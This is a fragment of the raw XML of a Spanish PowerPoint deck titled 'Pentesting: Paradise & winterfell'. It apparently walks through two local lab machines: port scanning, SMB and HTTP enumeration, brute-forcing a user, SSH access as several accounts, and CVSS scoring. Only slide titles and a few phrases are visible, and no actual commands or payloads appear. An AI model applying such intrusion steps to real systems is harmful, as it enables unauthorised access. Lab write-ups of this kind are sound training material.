                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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http://172.17.0.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Desde el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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por defecto de dicha aplicación únicamente nos muestra un index.html.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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Procederemos a entrar.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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ABB2100A-5F64-46F5-B067-77DA18C8EB3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084472" y="1965960"/>
            <a:ext cx="3934048" cy="4022725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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CA7169CE-8D90-4D16-BF6B-1602B302FC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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/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466307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Base">
  <a:themeElements>
    <a:clrScheme name="Base">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="565349"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="DDDDDD"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="A6B727"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="DF5327"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FE9E00"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="418AB3"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="D7D447"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="818183"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="F59E00"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="B2B2B2"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Base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se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ACC63D00-1EE0-4159-BF5A-6FF02000B710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Base</Template>
  <TotalTime>0</TotalTime>
  <Words>2489</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>229</Paragraphs>
  <Slides>34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34</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="39" baseType="lpstr">
      <vt:lpstr>Arial monospaced for SAP</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Base</vt:lpstr>
      <vt:lpstr>Pentesting:  Paradise  &amp; winterfell</vt:lpstr>
      <vt:lpstr>Instalación</vt:lpstr>
      <vt:lpstr>Paradise</vt:lpstr>
      <vt:lpstr>Instrucciones de uso</vt:lpstr>
      <vt:lpstr>Reconocimiento de Puertos</vt:lpstr>
      <vt:lpstr>Reconocimiento de Puertos:  22/tcp, 80/tcp.</vt:lpstr>
      <vt:lpstr>Reconocimiento de Puertos 139/tcp, 445/tcp</vt:lpstr>
      <vt:lpstr>Enumeración SMB</vt:lpstr>
      <vt:lpstr>Enumeración HTTP</vt:lpstr>
      <vt:lpstr>Andy´s House</vt:lpstr>
      <vt:lpstr>Comentario Andy´s House</vt:lpstr>
      <vt:lpstr>Fuerza Bruta: lucas</vt:lpstr>
      <vt:lpstr>lucas@172.17.0.2</vt:lpstr>
      <vt:lpstr>lucas@172.17.0.2</vt:lpstr>
      <vt:lpstr>andy@172.17.0.2</vt:lpstr>
      <vt:lpstr>WINTERFELL</vt:lpstr>
      <vt:lpstr>Instrucciones de uso</vt:lpstr>
      <vt:lpstr>Reconocimiento de Puertos</vt:lpstr>
      <vt:lpstr>Reconocimiento de Puertos: 22/tcp,80/tcp</vt:lpstr>
      <vt:lpstr>Reconocimiento de Puertos: 139/tcp,445/tcp</vt:lpstr>
      <vt:lpstr>Enumeración SMB</vt:lpstr>
      <vt:lpstr>Enumeración HTTP</vt:lpstr>
      <vt:lpstr>Enumeración HTTP</vt:lpstr>
      <vt:lpstr>Enumeración SMB</vt:lpstr>
      <vt:lpstr>ssh jon@172.17.0.2</vt:lpstr>
      <vt:lpstr>ssh jon@172.17.0.2</vt:lpstr>
      <vt:lpstr>ssh jon@172.17.0.2</vt:lpstr>
      <vt:lpstr>ssh jon@172.17.0.2</vt:lpstr>
      <vt:lpstr>ssh jon@172.17.0.2</vt:lpstr>
      <vt:lpstr>ssh jon@172.17.0.2</vt:lpstr>
      <vt:lpstr>ssh daenerys@172.17.0.2</vt:lpstr>
      <vt:lpstr>ssh@daenerys 172.17.0.2</vt:lpstr>
      <vt:lpstr>CVSS Paradise (Common Vulnerability Scoring System).</vt:lpstr>
      <vt:lpstr>CVSS Winterfell (Common Vulnerability Scoring System).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Luis</dc:creator>
  <cp:lastModifiedBy>Luis</cp:lastModifiedBy>
  <cp:revision>98</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-09T06:11:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-09T13:34:21Z</dcterms:modified>
</cp:coreProperties>
</file>